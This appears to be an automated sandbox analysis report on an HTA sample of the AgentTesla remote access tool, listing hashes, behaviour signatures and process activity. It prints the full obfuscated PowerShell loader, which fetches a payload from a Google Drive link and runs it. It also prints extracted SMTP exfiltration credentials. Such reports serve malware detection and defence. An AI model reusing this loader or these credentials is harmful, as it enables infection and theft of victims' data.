Analysis
-
max time kernel
148s -
max time network
144s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
22-05-2024 14:19
Static task
static1
Behavioral task
behavioral1
Sample
17e34e2c81eba5e138e335393b981fc11e2b21db0eecb2bc740dbbff7b9f8f32.hta
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
17e34e2c81eba5e138e335393b981fc11e2b21db0eecb2bc740dbbff7b9f8f32.hta
Resource
win10v2004-20240426-en
General
-
Target
17e34e2c81eba5e138e335393b981fc11e2b21db0eecb2bc740dbbff7b9f8f32.hta
-
Size
5KB
-
MD5
3ef5759d457c58dc4c8c9b6c15aca5fe
-
SHA1
be35dffec6716bfe6ece66f7e140b8df97d5b994
-
SHA256
17e34e2c81eba5e138e335393b981fc11e2b21db0eecb2bc740dbbff7b9f8f32
-
SHA512
c6b8c4452b774cd782b75891048ca0aacf1ffd0af55536e0d3a7643b6821b46004225b47bc4fbc81fd95c5f6f6aa0eb6dc34f659d0654b29a05b521c431b45e8
-
SSDEEP
96:buOGiiV+5y/gkgBONHwBB9HaXa3U+1hTIbtu7ZEhtNsim57V+ICgCtUfkX:ypD/gkgywP9HaKk+rTIBeuhtNN2CLtUY
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mail.bunturaja.co.id - Port:
587 - Username:
[email protected] - Password:
!@#$%,.Jakarta - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 3 2704 powershell.exe 5 2704 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 12 api.ipify.org 13 api.ipify.org 14 ip-api.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
wab.exepid process 2672 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 2508 powershell.exe 2672 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2508 set thread context of 2672 2508 powershell.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exewab.exepid process 2704 powershell.exe 2508 powershell.exe 2508 powershell.exe 2672 wab.exe 2672 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2508 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exewab.exedescription pid process Token: SeDebugPrivilege 2704 powershell.exe Token: SeDebugPrivilege 2508 powershell.exe Token: SeDebugPrivilege 2672 wab.exe -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
mshta.exepowershell.exepowershell.exedescription pid process target process PID 1280 wrote to memory of 2704 1280 mshta.exe powershell.exe PID 1280 wrote to memory of 2704 1280 mshta.exe powershell.exe PID 1280 wrote to memory of 2704 1280 mshta.exe powershell.exe PID 1280 wrote to memory of 2704 1280 mshta.exe powershell.exe PID 2704 wrote to memory of 2212 2704 powershell.exe cmd.exe PID 2704 wrote to memory of 2212 2704 powershell.exe cmd.exe PID 2704 wrote to memory of 2212 2704 powershell.exe cmd.exe PID 2704 wrote to memory of 2212 2704 powershell.exe cmd.exe PID 2704 wrote to memory of 2508 2704 powershell.exe powershell.exe PID 2704 wrote to memory of 2508 2704 powershell.exe powershell.exe PID 2704 wrote to memory of 2508 2704 powershell.exe powershell.exe PID 2704 wrote to memory of 2508 2704 powershell.exe powershell.exe PID 2508 wrote to memory of 2200 2508 powershell.exe cmd.exe PID 2508 wrote to memory of 2200 2508 powershell.exe cmd.exe PID 2508 wrote to memory of 2200 2508 powershell.exe cmd.exe PID 2508 wrote to memory of 2200 2508 powershell.exe cmd.exe PID 2508 wrote to memory of 2672 2508 powershell.exe wab.exe PID 2508 wrote to memory of 2672 2508 powershell.exe wab.exe PID 2508 wrote to memory of 2672 2508 powershell.exe wab.exe PID 2508 wrote to memory of 2672 2508 powershell.exe wab.exe PID 2508 wrote to memory of 2672 2508 powershell.exe wab.exe PID 2508 wrote to memory of 2672 2508 powershell.exe wab.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\17e34e2c81eba5e138e335393b981fc11e2b21db0eecb2bc740dbbff7b9f8f32.hta"1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1280 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bankerottens = 1;$Oversacrificially='Sub';$Oversacrificially+='strin';$Oversacrificially+='g';Function Anticipant($Harmonize){$Rjseren80=$Harmonize.Length-$Bankerottens;For($Papegjesygen18=1;$Papegjesygen18 -lt $Rjseren80;$Papegjesygen18+=2){$Funktionstegningernes+=$Harmonize.$Oversacrificially.Invoke( $Papegjesygen18, $Bankerottens);}$Funktionstegningernes;}function Harskes($Herligheds){. ($Undersay) ($Herligheds);}$Formularlngdes=Anticipant 'VM oGzbi.l.l.aS/ 5G.M0F (FW iYn dSoSwWsS MN TI ,1V0 .S0U;. ,WFiEn 6 4F;V SxU6E4D;C rUv :M1,2E1.. 0.)U MG e cFkso /M2C0 1W0F0H1.0,1S CFDi.rBeTf oLxP/B1 2i1..R0 ';$Baglokalers=Anticipant ' U sPeOrM- ACgSeMnUt. ';$Indpodede=Anticipant '.h.tVt pBs,: /L/ d r,iKvRe ..gMoBo g.l e . c oOm,/ u cG?.e x pAo.r t =Fd,osw nZlFo a d &Oi,d =,1V7HG yRc eHO.U WC7 OIK,NDbPJHW Q.X x 4L9,cSB jfIOQ.lHvN-DM BFlKkR ';$Ogamic=Anticipant ' > ';$Undersay=Anticipant 'Ri e.x. ';$Goalage='Hovedmenuernes';$Miljmyndigheds = Anticipant ' eKcbh.oU E%Wa,pbpsdCaEtUaR%.\MFbdSeSg oDd sFeQr n e .HCDoTnU I&S&J Me c hUoK .t, ';Harskes (Anticipant ',$ g lRoAbSaHlP: dIi s,bAa nMd e d =M( cImBd. /Cc T$FMTiel jfm,ySn dSiFg h eFd s,)T ');Harskes (Anticipant 'G$CgKlVoJb.aDl :DA n.n.e.k,s kDi r kBeBsa=P$KIGnSd.p oBd.eAdBeS.,sGpllSiht.(A$,O g.a,mBi,c.)C ');$Indpodede=$Annekskirkes[0];$Revisorforeningens= (Anticipant 'C$.g.lDo,bNaLlM:aOGmSs tTr.u,k tUuvrSe.rSi,nHgRe r,=,N,e wB-SOnb.j,e c tM S y sFt,egmA.PNFeCtT..W,e,b C,lFiSePn t');$Revisorforeningens+=$disbanded[1];Harskes ($Revisorforeningens);Harskes (Anticipant 'R$,O,mNsMt rCuRkDtBu.r eRr i n.g.e,rA.,HRe,a,d e r s,[ $PBLa.gUlUo.kta lBe,r,s ],=,$GFSobr,m uKlFa,rVl nTg d.e sE ');$Countersunken196=Anticipant ',$NOSmBs tFr uGk tPuFr,e r i n g e r..BDNoKwMnSlOo a d F.iSl,e.(.$.I.n,d pAoDdAeFdBeR, $ Z i.nTyCa,mRu n gZa )I ';$Zinyamunga=$disbanded[0];Harskes (Anticipant ' $NgblSo bBaFl :AO p h,vMe,sa=D(WTAe.sHt -SP a,tBhM .$.Z.i.n y a mCu n,g aP)C ');while (!$Ophves) {Harskes (Anticipant ' $,g,l o.bFa lb:KAIn dde,sobFj,e rFgEeOn e,1F2.3 =R$UtCr u eS ') ;Harskes $Countersunken196;Harskes (Anticipant ',S t aHrVtS- SAl eKePp, T4. ');Harskes (Anticipant 'f$ g.l o,bTa.lO:OOHpEh,v.e,sN=A( TBeCsStS-.PGa tPh, T$SZ i nAy.aMm u nPgNaa) ') ;Harskes (Anticipant 'g$Fg lToPboaHlA:UF.y.r sLt,eCr sB=P$,gSlSoBb.a l :VT wSi n eNl,eBs sC+ +U%K$.A.n nSeJkPs k,i rHk eEsP.Bc.o usn,tR ') ;$Indpodede=$Annekskirkes[$Fyrsters];}$Stormagasiners=352755;$Terreplein=25708;Harskes (Anticipant 'F$ gSl o,b a l.:sRFe g e ncs iPa n eDrSsH A= LGNe,t -SC o,n tPe.n tH S$ ZBi,nTyPaSm u,n g,a ');Harskes (Anticipant ' $ g,l oAbPaFlc:fV bBnKeFtF S= K[ SAyAsDt,e mW. CRoSnSvne r.t,] : : F.rHo m BHaOsSeU6.4AS.tNrci.nMg.(A$PRAeggFeSn sSiTa.n e,r sW)C ');Harskes (Anticipant 'A$bg l,oIb a lB:DBSrEu m a l .= [,S y s t.e m,.,TVe.xRt . ESn,c,oBd iSnUg ]I:A:,AVSHCBI IE.LG,eSt,Sdt,rTi.nHgE(S$KVEbTn eCtN)T ');Harskes (Anticipant 'F$,g l o b a lL: REe tCsSb e t.jTe,nFt = $bB,r uFmSa.lL.,sDu bIs tIrCi,nfg (A$ S t oOrBmRaMg aPs,i nKeErCs., $VTIe,r r,e.pPl,e,isn.), ');Harskes $Retsbetjent;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fdegodserne.Con && echo t"3⤵PID:2212
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bankerottens = 1;$Oversacrificially='Sub';$Oversacrificially+='strin';$Oversacrificially+='g';Function Anticipant($Harmonize){$Rjseren80=$Harmonize.Length-$Bankerottens;For($Papegjesygen18=1;$Papegjesygen18 -lt $Rjseren80;$Papegjesygen18+=2){$Funktionstegningernes+=$Harmonize.$Oversacrificially.Invoke( $Papegjesygen18, $Bankerottens);}$Funktionstegningernes;}function Harskes($Herligheds){. ($Undersay) ($Herligheds);}$Formularlngdes=Anticipant 'VM oGzbi.l.l.aS/ 5G.M0F (FW iYn dSoSwWsS MN TI ,1V0 .S0U;. ,WFiEn 6 4F;V SxU6E4D;C rUv :M1,2E1.. 0.)U MG e cFkso /M2C0 1W0F0H1.0,1S CFDi.rBeTf oLxP/B1 2i1..R0 ';$Baglokalers=Anticipant ' U sPeOrM- ACgSeMnUt. ';$Indpodede=Anticipant '.h.tVt pBs,: /L/ d r,iKvRe ..gMoBo g.l e . c oOm,/ u cG?.e x pAo.r t =Fd,osw nZlFo a d &Oi,d =,1V7HG yRc eHO.U WC7 OIK,NDbPJHW Q.X x 4L9,cSB jfIOQ.lHvN-DM BFlKkR ';$Ogamic=Anticipant ' > ';$Undersay=Anticipant 'Ri e.x. ';$Goalage='Hovedmenuernes';$Miljmyndigheds = Anticipant ' eKcbh.oU E%Wa,pbpsdCaEtUaR%.\MFbdSeSg oDd sFeQr n e .HCDoTnU I&S&J Me c hUoK .t, ';Harskes (Anticipant ',$ g lRoAbSaHlP: dIi s,bAa nMd e d =M( cImBd. /Cc T$FMTiel jfm,ySn dSiFg h eFd s,)T ');Harskes (Anticipant 'G$CgKlVoJb.aDl :DA n.n.e.k,s kDi r kBeBsa=P$KIGnSd.p oBd.eAdBeS.,sGpllSiht.(A$,O g.a,mBi,c.)C ');$Indpodede=$Annekskirkes[0];$Revisorforeningens= (Anticipant 'C$.g.lDo,bNaLlM:aOGmSs tTr.u,k tUuvrSe.rSi,nHgRe r,=,N,e wB-SOnb.j,e c tM S y sFt,egmA.PNFeCtT..W,e,b C,lFiSePn t');$Revisorforeningens+=$disbanded[1];Harskes ($Revisorforeningens);Harskes (Anticipant 'R$,O,mNsMt rCuRkDtBu.r eRr i n.g.e,rA.,HRe,a,d e r s,[ $PBLa.gUlUo.kta lBe,r,s ],=,$GFSobr,m uKlFa,rVl nTg d.e sE ');$Countersunken196=Anticipant ',$NOSmBs tFr uGk tPuFr,e r i n g e r..BDNoKwMnSlOo a d F.iSl,e.(.$.I.n,d pAoDdAeFdBeR, $ Z i.nTyCa,mRu n gZa )I ';$Zinyamunga=$disbanded[0];Harskes (Anticipant ' $NgblSo bBaFl :AO p h,vMe,sa=D(WTAe.sHt -SP a,tBhM .$.Z.i.n y a mCu n,g aP)C ');while (!$Ophves) {Harskes (Anticipant ' $,g,l o.bFa lb:KAIn dde,sobFj,e rFgEeOn e,1F2.3 =R$UtCr u eS ') ;Harskes $Countersunken196;Harskes (Anticipant ',S t aHrVtS- SAl eKePp, T4. ');Harskes (Anticipant 'f$ g.l o,bTa.lO:OOHpEh,v.e,sN=A( TBeCsStS-.PGa tPh, T$SZ i nAy.aMm u nPgNaa) ') ;Harskes (Anticipant 'g$Fg lToPboaHlA:UF.y.r sLt,eCr sB=P$,gSlSoBb.a l :VT wSi n eNl,eBs sC+ +U%K$.A.n nSeJkPs k,i rHk eEsP.Bc.o usn,tR ') ;$Indpodede=$Annekskirkes[$Fyrsters];}$Stormagasiners=352755;$Terreplein=25708;Harskes (Anticipant 'F$ gSl o,b a l.:sRFe g e ncs iPa n eDrSsH A= LGNe,t -SC o,n tPe.n tH S$ ZBi,nTyPaSm u,n g,a ');Harskes (Anticipant ' $ g,l oAbPaFlc:fV bBnKeFtF S= K[ SAyAsDt,e mW. CRoSnSvne r.t,] : : F.rHo m BHaOsSeU6.4AS.tNrci.nMg.(A$PRAeggFeSn sSiTa.n e,r sW)C ');Harskes (Anticipant 'A$bg l,oIb a lB:DBSrEu m a l .= [,S y s t.e m,.,TVe.xRt . ESn,c,oBd iSnUg ]I:A:,AVSHCBI IE.LG,eSt,Sdt,rTi.nHgE(S$KVEbTn eCtN)T ');Harskes (Anticipant 'F$,g l o b a lL: REe tCsSb e t.jTe,nFt = $bB,r uFmSa.lL.,sDu bIs tIrCi,nfg (A$ S t oOrBmRaMg aPs,i nKeErCs., $VTIe,r r,e.pPl,e,isn.), ');Harskes $Retsbetjent;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fdegodserne.Con && echo t"4⤵PID:2200
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2672
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Fdegodserne.ConFilesize
492KB
MD51fe03ff02fd5bae7e909af7c3471a4c7
SHA1cb1bb668c0e0191b63d7aac5ecd4117b8d05647e
SHA256b9aa136cd82e7b1c7381598d12be3297722ef09c005344168594fc5a1ed1414b
SHA51283d9a6c8de897c7d98b30117f7a94bd1048e33cd47961d75fd6ac0c7cf870ad6949265485b91a899f81fd5a0fca03a295281c4a6e46f29034b1db11b61e9696d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD5948af304322d6a545c8161e8d0ed7d3c
SHA1de376e784a3eee65dbdd0a226b9a2fb68e04b200
SHA25660eba1d326349c7e7e90a3f15d65308023cfadcfb0d1178b266b517798d6ed94
SHA512e416401d76fff54f6e2914dc4337003cbfefcdbf325b5f76564284cc7d5a47b13ce40fa060bbc8833dfcc4cbb5d5d660b62fb3824a116cb6e08c2c4752b23361
-
memory/2508-15-0x0000000006630000-0x000000000A4A2000-memory.dmpFilesize
62.4MB
-
memory/2672-39-0x0000000000FA0000-0x0000000002002000-memory.dmpFilesize
16.4MB
-
memory/2672-41-0x0000000000FA0000-0x0000000000FE2000-memory.dmpFilesize
264KB